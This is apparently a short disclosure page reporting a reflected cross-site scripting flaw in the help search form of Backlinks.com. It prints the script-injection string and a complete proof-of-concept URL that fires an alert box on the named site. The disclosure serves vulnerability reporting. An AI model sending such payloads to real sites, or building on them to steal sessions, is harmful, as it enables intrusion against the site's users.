Backlinks.com XSS Vulnerability

XSS13290

Overview

The help document search form on Backlinks.com does not correctly sanitise user input allowing an XSS attack to be executed.

The follow symbols are converted to to their URL encoded counterparts: <, >, /
Evasion string used (before encoding): /><script>alert(/XSS/)</script>

backlinks.com XSS Vulnerability

http://www.backlinks.com/kb/index.php/search
?search=1
&searchtext=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

Leave a comment

(required)(will not be published)(required)

Comments

There are no comments yet. Be the first to add one!